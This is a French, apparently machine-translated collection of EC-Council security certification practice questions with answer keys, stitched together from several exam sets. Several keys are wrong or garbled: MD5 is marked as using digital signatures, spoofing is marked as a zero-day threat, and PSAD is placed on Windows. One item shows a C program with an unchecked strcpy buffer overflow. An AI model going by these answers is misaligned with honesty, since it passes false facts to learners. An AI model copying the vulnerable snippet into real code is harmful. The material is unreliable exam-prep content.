Réponse: détournement de session

EC1-349 ECCouncil Computer Hacking Forensic Investigator Set 6


Laquelle des politiques suivantes est utilisée pour ajouter des informations supplémentaires sur la sécurité
globale et sert à protéger les employés et les organisations contre l'inefficacité ou l'ambiguïté?

Les options sont:

Politique informatique

Politique d'utilisation

Stratégie de groupe

Politique de sécurité spécifique au problème (correcte)

Réponse: politique de sécurité spécifique au problème

Lequel des éléments suivants est le meilleur moyen de protéger les données importantes contre les attaques
de virus?

Les options sont:

Prendre une sauvegarde quotidienne des données.

Mise à jour régulière du logiciel antivirus. (Correct)

Implémentation d'un pare-feu.

Utiliser des mots de passe forts pour se connecter au réseau.

Réponse: mise à jour régulière du logiciel antivirus.

Lequel des éléments suivants est un protocole qui décrit une approche pour fournir une prise en charge
«rationalisée» des services d'application OSI au-dessus des réseaux TCP / IP pour certains environnements

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 7/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA) Set d'examen 8

contraints?

Les options sont:

Protocole de conversation par relais Internet

Protocole de configuration d'hôte dynamique

Protocole de transfert de nouvelles réseau

Protocole de présentation léger (correct)

Réponse: Protocole de présentation léger

ECCouncil EC0-479 Analyste de sécurité certifié (ECSA) Set d'examen 1


Lequel des éléments suivants est un réseau multi-accès distribué qui aide à prendre en charge les
communications intégrées à l'aide d'un bus double et d'une file d'attente distribuée?

Les options sont:

Double bus à file d'attente distribuée (Correct)

Contrôle de liaison logique

Réseau Token Ring

CSMA / CA

Réponse: bus double à file d'attente distribuée


Lequel des protocoles suivants permet aux utilisateurs d'entrer un nom d'ordinateur convivial dans le
navigateur Windows et de mapper les lecteurs réseau et d'afficher les dossiers partagés?

Les options sont:

VoIP

NetBEUI (correct)

ARP

RAYON

Réponse: NetBEUI

Laquelle des attaques suivantes entre dans la catégorie d'une attaque active?

Les options sont:

Rejouer l'attaque (correct)

Écoute passive

Empreinte sans fil

Analyse du trafic

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 8/9
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité du réseau (ENSA) Set d'examen 8

Réponse: rejouer l'attaque

ECCouncil EC0-232 ec0-232 E-Commerce Architect Practice Practice Set 8


Laquelle des attaques suivantes combine des attaques par dictionnaire et des attaques par force brute?

Les options sont:

Attaque hybride (correcte)

Une attaque par phishing

Rejouer l'attaque

Attaque de l'homme du milieu

Réponse: attaque hybride

Lequel des éléments suivants est un type de VPN impliquant une seule passerelle VPN?

Les options sont:

VPN basé sur intranet

VPN basé sur l'extranet (correct)

VPN d'accès à distance

VPN PPTP

Réponse: VPN basé sur l'extranet

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-8 9/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9

ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité


réseau (ENSA) 9
Laquelle des techniques suivantes est utilisée pour dessiner des symboles dans les lieux publics pour la
publicité d'un réseau sans fil Wi-Fi ouvert?

Les options sont:

Numérotation de guerre

Warchalking (Correct)

Conduite de guerre

Spamming

Réponse: Warchalking

EC-Council Certified Security Analyst (ECSA) Examens 2019 Set 9

Laquelle des pratiques suivantes consiste à envoyer des e-mails indésirables, souvent avec un contenu
commercial, en grande quantité à un ensemble de destinataires aveugles? Chaque bonne réponse représente
une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Usurpation d'adresse e-mail

Spam par e-mail (correct)

Courrier indésirable (correct)

Brouillage des e-mails

Réponse: Courriel indésirable Courrier indésirable


Lequel des appareils suivants permet aux appareils de communication sans fil de se connecter à un réseau
sans fil en utilisant le Wi-Fi, le Bluetooth ou des normes connexes?

Les options sont:

Carte express

WAP (correct)

WNIC

Répéteur sans fil

Réponse: WAP
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-9 1/11
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9

Adam travaille comme testeur de pénétration professionnel. Un projet lui a été assigné pour tester les
vulnérabilités du routeur CISCO d'Umbrella Inc. Adam découvre qu'il existe une vulnérabilité d'accès
arbitraire à la configuration HTTP dans le routeur. En appliquant différents outils de craquage de mot de
passe, Adam accède au routeur. Il analyse le fichier de configuration du routeur et remarque les lignes
suivantes: journalisation des erreurs tamponnées historique de la journalisation critiques des pièges de
journalisation avertissements journalisation 10.0.1.103 En analysant les lignes ci-dessus, Adam conclut que
ce routeur se connecte au niveau de journal 4 au serveur syslog 10.0.1.103. Il décide de changer le niveau de
journal de 4 à 0. Laquelle des raisons suivantes est la raison la plus probable de changer le niveau de
journal?

Les options sont:

La modification du niveau de journalisation de 4 à 0 entraînera la fin de la journalisation. De cette façon, la


modification dans le routeur n'est pas envoyée au serveur syslog.

La modification du niveau de journalisation de 4 à 0 entraînera la journalisation des seules urgences. De cette façon, la
modification dans le routeur n'est pas envoyée au serveur syslog. (Correct)

En modifiant le niveau de journalisation, Adam peut facilement effectuer une attaque par injection SQL.

La modification du niveau de journalisation accorde l'accès au routeur en tant qu'administrateur.

Réponse: la modification du niveau de journalisation de 4 à 0 entraînera la journalisation des seules


urgences. De cette façon, la modification dans le routeur n'est pas envoyée au serveur syslog.

ECCouncil ECSS Certified Security Specialist Practice Exam Set 10

Dans laquelle des conditions suivantes le système passe-t-il en mode moniteur ROM? Chaque bonne
réponse représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Le routeur ne trouve pas d'image de système d'exploitation valide. (Correct)

Le routeur n'a pas de fichier de configuration.

L'utilisateur interrompt la séquence de démarrage. (Correct)

Il est nécessaire de définir des paramètres de fonctionnement.

Réponse: Le routeur ne trouve pas d'image de système d'exploitation valide.L'utilisateur interrompt la


séquence de démarrage.
Lequel des éléments suivants est un outil qui s'exécute sur le système d'exploitation Windows et analyse les
messages du journal iptables pour détecter les analyses de port et tout autre trafic suspect?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-9 2/11
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9

Les options sont:

PSAD (correct)

NetRanger

Nmap

Hping

Réponse: PSAD

Laquelle des procédures suivantes est conçue pour permettre au personnel de sécurité d'identifier,
d'atténuer et de récupérer des incidents informatiques malveillants, tels qu'un accès non autorisé à un
système ou à des données, un déni de service ou des modifications non autorisées du matériel, des logiciels
ou des données du système ?

Les options sont:

Plan de reprise après sinistre

Plan d'urgence pour les occupants

Plan de communication de crise

Plan de réponse aux incidents cybernétiques (correct)

Réponse: Plan de réponse aux incidents cybernétiques

EC0-349 Computer Hacking Forensic Investigator Exam Set 6

Adam travaille comme analyste de sécurité pour Umbrella Inc. La société possède un réseau basé sur Linux
comprenant un serveur Apache pour les applications Web. Il a reçu le journal de serveur Web Apache
suivant, qui est le suivant: [sam nov 16 14:32:52 2009] [erreur] [client 128.0.0.7] client refusé par la
configuration du serveur: / export / home / htdocs / test Le premier élément dans l'entrée de journal est la
date et l'heure du message de journal. La deuxième entrée détermine la gravité de l'erreur
signalée. Maintenant, Adam veut changer le niveau de gravité pour contrôler les types d'erreurs qui sont
envoyés au journal des erreurs. Laquelle des directives suivantes Adam utilisera-t-il pour accomplir la
tâche?

Les options sont:

LogLevel (correct)

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-9 3/11
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9
CustomLog

ErrorLog

LogFormat

Réponse: LogLevel

Parmi les éléments suivants, quels sont les problèmes de sécurité courants liés aux communications et aux e-
mails? Chaque bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Répudiation des messages (correct)

Modification du message (correct)

Écoute (correcte)

Relecture du message (correct)

Usurpation d'identité (correcte)

Faux message (correct)

Réponse: Répudiation du message Modification du message Écoute clandestine Lecture du message Vol
d'identité Faux message

Lequel des éléments suivants est un processus qui détecte un problème, détermine sa cause, minimise les
dommages, résout le problème et documente chaque étape de la réponse pour référence future?

Les options sont:

La gestion des incidents

Traitement des incidents

Réponse à l'incident (correct)

Planification des incidents

Réponse: réponse aux incidents

ECCouncil 712-50 Ensemble d'examens de pratique certifiés CISO (CCISO) 11

Laquelle des techniques suivantes utilise un modem pour numériser automatiquement une liste de numéros
de téléphone?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-9 4/11
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9

Les options sont:

Warchalking

Warkitting

Numérotation de guerre (correct)

Conduite de guerre

Réponse: composition de guerre

Parmi les techniques de chiffrement suivantes, lesquelles utilisent les signatures numériques?

Les options sont:

Blowfish

IDÉE

MD5 (correct)

RSA

Réponse: MD5

Parmi les attaques suivantes, lesquelles sont des menaces informatiques qui tentent d'exploiter des
vulnérabilités d'applications informatiques inconnues des autres ou non dévoilées au développeur du
logiciel? Chaque bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Zero-day

Usurpation (correcte)

Zéro heure (correct)

Débordement de tampon

Réponse: usurpation de zéro heure

ECCouncil 312-50 Certifié Ethical Hacker Certified Exam Set 3

Dans lequel des types de scans de ports suivants le scanneur tente-t-il de se connecter aux 65 535 ports?

Les options sont:

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-9 5/11
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9
UDP

Rebond FTP

Strobe

Vanille (correct)

Réponse: vanille

Lequel des protocoles suivants utilise un canal de contrôle sur TCP et un tunnel GRE fonctionnant pour
encapsuler les paquets PPP?

Les options sont:

SSTP

ESP

PPTP (correct)

LWAPP

Réponse: PPTP
Lequel des éléments suivants est une architecture d'application distribuée qui répartit les tâches ou les
charges de travail entre les fournisseurs de services et les demandeurs de services? Chaque bonne réponse
représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

Mise en réseau client-serveur (correct)

Réseautage poste à poste

Informatique client-serveur (Correct)

Informatique peer-to-peer (P2P)

Réponse: Réseau client-serveur Informatique client-serveur

ECCouncil EC0-349 Computer Hack Forensic Investigator Exam Set 6

Lequel des services suivants est un service de télécommunication conçu pour une transmission de données
rentable pour le trafic intermittent entre les réseaux locaux (LAN) et entre les points d'extrémité d'un
réseau étendu (WAN)?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-9 6/11
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9

Les options sont:

X.25

Relais de trame (correct)

PPP

RNIS

Réponse: relais de trame

Lequel des éléments suivants est un champ 16 bits qui identifie le numéro de port source du programme
d'application dans l'hôte qui envoie le segment?

Les options sont:

Numéro de séquence

Longueur d'en-tête

Adresse du port source (correcte)

Numéro d'accusé de réception

Réponse: Adresse du port source

Lequel des dispositifs biométriques suivants est utilisé pour prendre des empreintes des arêtes de friction de
la peau sur le dessous du bout des doigts?

Les options sont:

Caméra à iris

Dispositif de reconnaissance faciale

Empreinte vocale de reconnaissance vocale

Lecteur d'empreintes digitales (correct)

Réponse: lecteur d'empreintes digitales

ECCouncil 712-50 CISO Certified (CISIS) Practice Exam Set 4

Laquelle des topologies suivantes est un type de conception de réseau physique dans laquelle chaque
ordinateur du réseau est connecté à un périphérique central via un câble à paire torsadée non blindée
(UTP)?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-9 7/11
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9

Les options sont:

Topologie en étoile (correcte)

Topologie en anneau

Topologie maillée

Topologie de bus

Réponse: Topologie en étoile

Lequel des éléments suivants est un protocole de découverte de services qui permet aux ordinateurs et
autres périphériques de trouver des services dans un réseau local sans configuration préalable?

Les options sont:

SLP (correct)

NNTP

NTP

DCAP

Réponse: SLP
Lequel des éléments suivants est un système de détection d'intrusion qui surveille et analyse les composants
internes d'un système informatique plutôt que les paquets réseau sur ses interfaces externes?

Les options sont:

HIDS (correct)

DMZ

NIDS

IPS

Réponse: HIDS

ECCouncil EC0-232 ec0-232 E-Commerce Architect Practice Practice Set 5

Lequel des éléments suivants est également appelé pare-feu avec état?

Les options sont:

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-9 8/11
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9
Pare-feu de filtrage de paquets dynamique (correct)

DMZ

Pare-feu PIX

Pare-feu sans état

Réponse: Pare-feu de filtrage de paquets dynamique

Lequel des éléments suivants est un pare-feu qui assure le suivi de l'état des connexions réseau qui le
traversent?

Les options sont:

Pare-feu de passerelle d'application

Pare-feu de filtre de paquets sans état

Pare-feu proxy au niveau du circuit

Pare-feu dynamique (correct)

Réponse: Pare-feu dynamique

Lequel des protocoles suivants est utilisé pour échanger des informations de routage entre deux passerelles
dans un réseau de systèmes autonomes?

Les options sont:

OSPF

EGP (correct)

IGMP

ICMP

Réponse: EGP

ECCouncil ECSS Certified Security Specialist Practice Exam Set 9


Lequel des types de VPN suivants utilise Internet comme épine dorsale principale, permettant aux
utilisateurs, aux clients et aux succursales d'accéder aux ressources du réseau d'entreprise à travers diverses
architectures de réseau?

Les options sont:

VPN PPTP

VPN basé sur l'extranet (correct)

VPN basé sur intranet

VPN d'accès à distance

Réponse: VPN basé sur l'extranet

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-9 9/11
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9

John travaille comme programmeur C. Il développe le programme C suivant: #include #include #include
int buffer (char * str) {char buffer1 [10]; strcpy (buffer1, str); return 1;} int main (int argc, char * argv [])
{buffer (argv [1]); printf ("Exécuté \ n"); retour 1; } Son programme est vulnérable à une attaque
__________.

Les options sont:

Déni de service

Débordement de tampon (correct)

Scriptage intersite

Injection SQL

Réponse: Buffer overflow

Lequel des éléments suivants est un réseau qui prend en charge les communications mobiles sur un nombre
arbitraire de réseaux locaux sans fil et de zones de couverture satellite?

Les options sont:

BLÊME

LAN

GAN (correct)

HAN

Réponse: GAN

ECCouncil ECSS Certified Security Specialist Practice Exam Set 4


Lequel des éléments suivants est la forme complète de SAINT?

Les options sont:

Outil réseau intégré de l'administrateur système

Outil de réseau intégré d'administration de sécurité

Outil réseau intégré des administrateurs système (correct)

Outil de réseau intégré automatisé par système

Réponse: Outil réseau intégré des administrateurs système

Jason travaille en tant qu'administrateur système pour www.company.com Inc. La société possède un
réseau Windows. Sam, un employé de l'entreprise, modifie accidentellement certaines applications et
certains paramètres système. Il se plaint à Jason que son système ne fonctionne pas correctement. Pour
résoudre le problème, Jason diagnostique les composants internes de son ordinateur et observe que
certaines modifications ont été apportées au registre informatique de Sam. Pour corriger le problème, Jason

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-9 10/11
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 9

doit restaurer le registre. Lequel des utilitaires suivants Jason peut-il utiliser pour accomplir la
tâche? Chaque bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Les options sont:

EventCombMT

Regedit.exe (correct)

Reg.exe (correct)

Registraire resplendissant (correct)

Réponse: Regedit.exe Reg.exe registraire resplendissant

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-9 11/11